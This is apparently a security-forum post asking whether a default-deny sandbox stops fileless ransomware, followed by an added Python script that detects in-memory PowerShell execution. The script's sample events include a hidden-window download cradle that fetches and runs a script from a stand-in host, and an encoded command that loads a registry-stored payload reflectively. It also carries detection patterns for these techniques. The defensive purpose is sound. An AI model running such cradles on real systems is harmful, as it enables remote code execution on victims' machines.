More Fun with Ransomware Part 5
Quoting 1qay1qay (post 513937):

Cruelsister, first things first - thanks for your knowledge and no-BS answer!

1). "First off, remember to set CF at the Proactive configuration to block things from any location."

This is my main question: can auto-sandbox (default deny ALL unknown) help in this fileless attack or not?

Since I did not see any fileless infection in action (and I hope that will stay so regarding a live attack ... I would like to see one only in your video), I would like to know if the payload does get written at any stage to disk, or is really everything done in RAM - as the name says - fileless?

Until now I did follow your recommendation and did not use HIPS - but the Proactive setting uses HIPS, if I remember correctly?

2). "When considering fileless malware, even though the mechanism of action of this type of malware varies - many hide out in RAM and from there inject into legit processes, something like POWELIKS will target the registry, Phasebot uses PowerShell."

So with your expert knowledge: is it possible to create/generate and finally start crypto-xxx (and finally successfully encrypt user files on HD) without ANY payload written to hard disk BEFORE the actual encryption of user files on the hard disk starts?

3). "But no matter what the mechanism is, the spawned stuff, no matter if it is PowerShell or a hollowed svchost, would still be contained within the sandbox and suppressed from doing systemic damage."

If I understand Comodo FW correctly: this is true ONLY if I run any browser in the sandbox (with green border) - correct?
But if I run the browser normally and get this exploit, my files will be encrypted - Comodo auto-sandbox with "default deny ALL unknown from ALL sources" will not help me since there will not be any file to block - everything will be executed in memory - do I get this correct? (Even if we assume that the malware does need contact with the CC and will send a request for a unique key before starting encryption - that should be blocked with the FW - but in the fileless scenario this request will still be made from the "trusted" browser and will not be blocked ...)

5). "Time Delay method of sandbox evasion - one of the standard methods used to trick a person to run a file outside the box. More popular is the DLL search."

So I suppose that we can say that making any rating and decision on an unknown file based only on sandbox behaviour is Russian roulette (and this time in the real sense of the words ... with a big R).
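The post above asks whether a "fileless" chain (PowerShell cradle, registry-resident payload in the POWELIKS style, reflective assembly loading) leaves anything for a file-based default-deny sandbox to block. Where it leaves a trace is in the process command line and the decoded script, so the practical check on the defending side is to look there. The following is an added example, not code from the thread or from Comodo: a small Python triage of PowerShell process-creation command lines that decodes `-EncodedCommand` blobs (base64 of UTF-16LE, which is what PowerShell expects) and scores the usual in-memory indicators. The sample events, the `example.invalid` URL, the `HKCU:\Software\Demo` key and the score threshold are all constructed for illustration.

```python
"""Triage of PowerShell command lines for in-memory ("fileless") execution
indicators: download cradles, Invoke-Expression, reflective assembly loading,
base64-decoded payloads pulled from the registry, and -EncodedCommand blobs.
Added example; the events below are constructed, not real telemetry."""
import base64
import re

# Indicators commonly seen when the payload never touches disk as a file.
INDICATORS = {
    "download_cradle": re.compile(
        r"(DownloadString|DownloadData|Invoke-WebRequest|\bIWR\b|Net\.WebClient)", re.I),
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "reflective_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "noprofile": re.compile(r"-nop(rofile)?\b", re.I),
    # POWELIKS-style: script body stored under a registry value, read back at run time.
    "registry_payload": re.compile(r"Get-ItemProperty|HKCU:|HKLM:", re.I),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_RX = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script):
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENCODED_RX.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Score one command line; indicators are matched against the decoded script
    (not the opaque base64 blob) when -EncodedCommand is present."""
    hits = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")
        # Drop the blob so base64 noise cannot trigger a word-boundary match,
        # then scan the plaintext script that PowerShell would actually run.
        text = ENCODED_RX.sub(" ", cmdline) + "\n" + decoded
    hits += sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"hits": hits, "decoded": decoded, "score": len(hits)}


# Constructed sample process-creation events (Sysmon event 1 style, trimmed).
SAMPLE_EVENTS = [
    # Benign admin use: -NoProfile alone is not worth an alert.
    "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users\\alice\\Documents",
    # Classic download cradle: script fetched and run from memory, hidden window.
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/s.ps1')\"",
    # Registry-resident payload loaded reflectively, wrapped in -EncodedCommand.
    "powershell.exe -enc " + encode_command(
        "$b=[Convert]::FromBase64String((Get-ItemProperty HKCU:\\Software\\Demo).Blob);"
        "[Reflection.Assembly]::Load($b)"),
]


def triage(events, threshold=2):
    """Return (event, analysis) pairs whose score reaches the threshold, highest first."""
    scored = [(e, analyze(e)) for e in events]
    flagged = [(e, r) for e, r in scored if r["score"] >= threshold]
    return sorted(flagged, key=lambda er: -er[1]["score"])


if __name__ == "__main__":
    for event, result in triage(SAMPLE_EVENTS):
        print(result["score"], result["hits"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

The point the example makes for the thread's question: a file-based default-deny never sees the script in event 2 or 3 as a file, but the command line and the decoded script are still observable to anything that logs process creation or PowerShell script blocks, which is where the "is there anything to block" question gets a concrete answer. Thresholds and indicator lists are a starting point to tune against your own baseline, not a verdict.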